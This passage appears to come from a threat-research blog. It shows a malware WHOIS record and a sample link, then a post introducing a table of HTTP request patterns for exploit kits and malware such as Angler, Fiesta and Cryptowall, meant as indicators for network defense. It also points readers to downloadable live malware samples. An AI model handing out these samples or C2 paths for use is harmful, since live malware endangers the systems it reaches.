<span style="color: yellow; font-family: inherit;">Update Date: 2014-08-25T06:58:17Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Creation Date: 2012-11-27T14:02:55Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Registration Expiration Date: 2016-11-27T14:02:55Z</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar: GoDaddy.com, LLC</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar IANA ID: 146</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Abuse Contact Email: abuse@godaddy.com</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrar Abuse Contact Phone: +1.480-624-2505</span></div>
<div>
<span style="color: yellow;"><br /></span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registry Registrant ID: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Name: smaina smaina</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Organization: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Street: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant City: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant State/Province: Beijing</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Postal Code: 100080</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Country: China</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Phone: +86.18622222222</span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Phone Ext: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Fax: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Fax Ext: </span></div>
<div>
<span style="color: yellow; font-family: inherit;">Registrant Email: tuhao550@gmail.com</span></div>
<div style="text-decoration: underline;">
<br /></div>
</div>
<div style="text-decoration: underline;">
<br /></div>
<div style="text-decoration: underline;">
-----------------------------------------------------------------------------------------------------------------------</div>
<div>
<h3 style="text-align: left;">
<span style="font-family: inherit;">Analysis Files</span></h3>
<a href="https://files.deependresearch.org/malware/Linux_xnote1_F374D1561E553A4C5B803E1D9D15A34E-samp.zip" target="_blank">Malware - f374d1561e553a4c5b803e1d9d15a34e</a></div>
<div>
(Uses same password scheme as Contagio. Ping me or Mila for details if needed)</div>
<div>
<br /></div>
</div>
Andre M. DiMinohttp://www.blogger.com/profile/07255414624107506662noreply@blogger.com0tag:blogger.com,1999:blog-74827929652568895.post-2136784844462886642015-02-05T07:08:00.000-05:002015-02-05T08:55:22.093-05:00Library of Malware Traffic Patterns<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<span style="color: #f1c232;"><b>Update February 2015 </b></span><br />
<i>Use the new link below for a new interface and updates.</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzS7IFYkKqSs-QIhIJ9dxlstc6ym9Nzt1dmBYu8hGNgGXfGdz5bAJ3bGjuqWSifizfl8i5sUT1JNpM2Gi1Cjv-qhVek5XqcPYpFQTV2tB6fZGntUbmQjngZQfuyZ8KczXN8rvH3jZK5is/s1600/walker2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzS7IFYkKqSs-QIhIJ9dxlstc6ym9Nzt1dmBYu8hGNgGXfGdz5bAJ3bGjuqWSifizfl8i5sUT1JNpM2Gi1Cjv-qhVek5XqcPYpFQTV2tB6fZGntUbmQjngZQfuyZ8KczXN8rvH3jZK5is/s1600/walker2.png" height="176" width="320" /></a></div>
Traffic analysis has been the primary method of malware identification and thousands of IDS signatures developed are the daily proof. Signatures definitely help but ability to visually recognize malware traffic patterns has been always an important skill for anyone tasked with network defense. The number of malware analysis blogs and papers is overwhelming and it is difficult to keep track of malware features if you don't have access to a well designed and constantly updated malware database. This started as "personal notes" spreadsheet with GET and POST requests for different malware families with information from open sources. We decided others might find it useful too.<br />
<br />
Click on the column headers to see recent entries. Use other column headers to sort as needed. Wait a few seconds for the table to load from the Google Sheet. URI and User-Agent fields might have spaces for easier cell wrapping. Remove them if you export the data.<br />
Yes, you can download samples mentioned in the spreadsheet. See the "dl" column in the full spreadsheet table and corresponding links to the download location. Use "Contagio" password scheme (email Mila or admin at deependresearch.org)<br />
<span style="color: #cccccc; font-size: x-small;">Image credit: Jay Walker Library. Src.Vancouversun</span><br />
<h4 style="text-align: center;">
<a href="http://deependdata.blogspot.com/2015/01/malware-traffic-patterns-2015.html">VIEW OR DOWNLOAD "MALWARE TRAFFIC PATTERNS"</a></h4>
<h4 style="text-align: center;">
<span style="text-align: left;"> List of malware families and available downloads for their samples, pcaps (click on the link above for the full post)</span></h4>
<div>
<br />
<a name='more'></a><br /></div>
<div>
<table border="1" cellpadding="0" cellspacing="0" dir="ltr" style="border-collapse: collapse; border: 1px solid #ccc; font-family: arial,sans,sans-serif; font-size: 13px; table-layout: fixed;"><colgroup><col width="100"></col><col width="100"></col><col width="100"></col><col width="418"></col></colgroup><tbody>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"type"]" style="font-weight: bold; padding: 2px 3px; vertical-align: top; white-space: nowrap;"><span style="font-size: x-small;">type</span></td><td data-sheets-value="[null,2,"family"]" style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">family</span></td><td data-sheets-value="[null,2,"method"]" style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">method</span></td><td data-sheets-value="[null,2,"uri"]" style="font-weight: bold; padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">uri</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Carberb / /Glupteba"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Carberb / /Glupteba</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/get_ads.php?yy=1&aid=2&atr=exts&src=199\n/go/p1011105.subexts\n/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1\n/javascript/live_cd/popunder_script-1400195675.js\n/images/ffadult/css/header.css\n/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/get_ads.php?yy=1&aid=2&atr=exts&src=199<br />/go/p1011105.subexts<br />/go/page/landing_page_68?nid=14&layout=qna&pid= p1011105.subexts&ip=auto&no_click=1&alpo_redirect=1<br />/javascript/live_cd/popunder_script-1400195675.js<br />/images/ffadult/css/header.css<br />/css/live_cd/ffadult/chinese/0/global_facelift-1414007370.css</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G\n&QPy3i=J4HP58S7h&dRPS8=7bi7Y\n/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c\n/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR\n/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5\n/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/?_SPMq=vahK1gfvq3&z1_Aj =fW8sL8ld&nkPgy= 81S8Y0_&0Us9=dr_fSq3Jai&w7Eaf= fu5dv5&wDK9=Ydqk1z4o6&52YRK=eHl9jdJ8j&I86 __=He0S4m9G<br />&QPy3i=J4HP58S7h&dRPS8=7bi7Y<br />/?3W_wN=I40_W5_&eht =t8vP8M8L&2ad_uO= 33KPa&_s3oi=8P5_7&QLfo= cHai8w&ZM7P_K=bSG7TH3p&UKb38= 1s4wx2s&jSJyB=cM7c<br />/?sk9=7ufJ8Ky7H8nS34n7f1h8t887R49&eDf= 1foPbZaw1VcxcHlfJdVw83P69hP1uSdYbR<br />/?_I4XS=idKbueq4kR1q8&0TsZ= Y0Wn7Lbr6K9hch&thXvW=56WPaqG2OdJ0&Ff_lty= x21dbrs8y5<br />/?m_FxE=eh0&MkFq=H8GeS&fz7= 1l3&d2T6r=ae&LeH_9= k0Il2W&Z7i6=3S1&7h_ =Sdlc&zmGAU=i0uf&mMwf=ehp5p& ymV7T=y7lKe&Jpk_DF=_5_2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Fiesta EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Fiesta EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9\n/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94\n/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/yzzzpiehxpvij8ps46znskyaqfa5ijkduakhxwcbj9<br />/ai_qkvu2/4a374fcc5b4966050058040c015d5253005 2030f0f5201530f54070e0507525450;118800;94<br />/ai_qkvu2/074f70a95a1651de5952585d020b5009040 4045e0c0403090b02005f0651500e54</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gongdad / Gong Da compromised site redirects"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gongdad / Gong Da compromised site redirects</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/pg/kcp/index.html\n/popup/index.html\n/my/by4.html"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/pg/kcp/index.html<br />/popup/index.html<br />/my/by4.html</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Gongdad / Gong Da EK"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gongdad / Gong Da EK</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/data/file/cr/index.html \n/data/file/cr/swfobject.js\n/data/file/cr/jquery-1.4.2.min.js\n/data/file/cr/main.html\n/data/file/cr/AyVpSf.jar\n/data/file/cr/com.class\n/data/file/cr/edu.class\n/data/file/cr/net.class\n/data/file/cr/org.class /windos.exe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/data/file/cr/index.html <br />/data/file/cr/swfobject.js<br />/data/file/cr/jquery-1.4.2.min.js<br />/data/file/cr/main.html<br />/data/file/cr/AyVpSf.jar<br />/data/file/cr/com.class<br />/data/file/cr/edu.class<br />/data/file/cr/net.class<br />/data/file/cr/org.class /windos.exe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Dalexis Loader"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Dalexis Loader</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/tmp/pack.tar.gz\n/assets/pack.tar.gz\n/piwigotest/pack.tar.gz\n/histoiredesarts/pack.tar.gz\n/fit/pack.tar.gz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/tmp/pack.tar.gz<br />/assets/pack.tar.gz<br />/piwigotest/pack.tar.gz<br />/histoiredesarts/pack.tar.gz<br />/fit/pack.tar.gz</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT</span></td><td data-sheets-value="[null,2,"Gholee / Rocket Kitten"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Gholee / Rocket Kitten</span></td><td data-sheets-value="[null,2,"GET / POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET / POST</span></td><td data-sheets-value="[null,2,"/index.php?c=Ud7atknq&r=17117d\n/index.php?c=Ud7atknq&r=1710b2"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/index.php?c=Ud7atknq&r=17117d<br />/index.php?c=Ud7atknq&r=1710b2</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zemot"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/b/shoe"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/shoe</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zemot DL via Asprox"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot DL via Asprox</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/catalog/159"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/catalog/159</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zemot downloading Rovnix"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot downloading Rovnix</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mod_jshopping_products_gdle/mod_smartslider2/"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mod_jshopping_products_gdle/mod_smartslider2/</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zemot downloading Rerdom"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zemot downloading Rerdom</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/mod_jshoppi/soft32.dl"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/mod_jshoppi/soft32.dl</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Rerdom"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Rerdom</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/b/eve/<redacted>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/eve/<redacted></redacted></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Clickfraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Clickfraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/b/req/<redacted>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/req/<redacted></redacted></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cidox / Rerdom / Clickfraud"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/b/eve/e91425775cc5d7e657bd2cc7\n/b/letr/21D84379F768D95442B92BC5\n/b/opt/E1805AD5D79824076249D696\n/b/req/FDD953BA382388758DF27AE4\n/b/pkg/<redacted>"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/b/eve/e91425775cc5d7e657bd2cc7<br />/b/letr/21D84379F768D95442B92BC5<br />/b/opt/E1805AD5D79824076249D696<br />/b/req/FDD953BA382388758DF27AE4<br />/b/pkg/<redacted></redacted></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cidox / Rerdom / Clickfraud - clickurl GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud - clickurl GET</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/x/48petqwk9/<redacted>/AA/0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/x/48petqwk9/<redacted>/AA/0</redacted></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cidox / Rerdom / Clickfraud - clickurl GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cidox / Rerdom / Clickfraud - clickurl GET</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/2014/06/26/new-game-tech-behind-scenes-sony -playstation with referrer http://controller-best.com</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"APT / CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">APT / CRIME</span></td><td data-sheets-value="[null,2,"Scieron / Httneilc / HTClient"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Scieron / Httneilc / HTClient</span></td><td style="padding: 2px 3px 2px 3px; vertical-align: bottom;"></td><td data-sheets-value="[null,2,"packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82\n0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38\n0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04\n0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13\n0040 00 12 00 63 01 00"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">packet data 0000 16 03 01 00 41 01 00 00 3d 03 01 54 c1 2a fa 82<br />0010 a5 0b 00 4c 7b 26 c9 33 81 bd 63 34 08 ab b3 38<br />0020 3a de 83 db b1 9c 95 02 3e c3 34 00 00 16 00 04<br />0030 00 05 00 0a 00 09 00 64 00 62 00 03 00 06 00 13<br />0040 00 12 00 63 01 00</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Zollard RFI"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Zollard RFI</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/cgi-bin/php? %2D%64+%...<long string removed php encoded>...%2D%6E"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/cgi-bin/php? %2D%64+%...<long encoded="" php="" removed="" string="">...%2D%6E</long></span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Upatre"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Upatre</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/js/jquery-1.41.15.js\n/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js\n/js/jquery-1.41.15.js?get_message=3290013886"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/js/jquery-1.41.15.js<br />/js/jquery-1.41.15.js?aCNDrnl3=[user-agent string]&hjmcSOLrVb5fK5a =1846&kZuJV1OyPrXdK0= 1267859342&OjyOcmABhJHuu=gDyC5hx734Wu1.js<br />/js/jquery-1.41.15.js?get_message=3290013886</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Cryptowall 3.0"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Cryptowall 3.0</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"http://proxy1-1-1.i2p/fee4roy2hih9\nhttp://payto4gtpn5czl2.torforall.com/ofs20c"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">http://proxy1-1-1.i2p/fee4roy2hih9<br />http://payto4gtpn5czl2.torforall.com/ofs20c</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Andromeda"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Andromeda</span></td><td data-sheets-value="[null,2,"POST"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">POST</span></td><td data-sheets-value="[null,2,"/ldr.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/ldr.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/t19jl0hvv2.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/t19jl0hvv2.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/752s2n0ndw.php"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/752s2n0ndw.php</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/erL0pIvz9_wyAlk2koy7L4b2qScYutODp2Cm dYZyW hw1bW9lGM8EDW8cKKjx47cp</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/P-SqI9OgILhp9clsf2ne5wgWHy4i2ew2hy 48WScNKA 9m2DKeiJNTp7gSxYSPcXsN</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/models/runway/ring/header.js"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/models/runway/ring/header.js</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Angler EK Chain"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Angler EK Chain</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/code/decrease/revenue/core.js"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/code/decrease/revenue/core.js</span></td></tr>
<tr style="height: 21px;"><td data-sheets-value="[null,2,"CRIME"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">CRIME</span></td><td data-sheets-value="[null,2,"Asprox / Kuluoz"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">Asprox / Kuluoz</span></td><td data-sheets-value="[null,2,"GET"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">GET</span></td><td data-sheets-value="[null,2,"/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=\nHTTPS over port 443 as a possible connectivity check"]" style="padding: 2px 3px; vertical-align: top;"><span style="font-size: x-small;">/include.php?t=20lB5S+e4qW48vWs/RXbneRWTR9t JTB67xoumOnEvak=<br />HTTPS over port 443 as a possible connectivity check</span></td></tr>
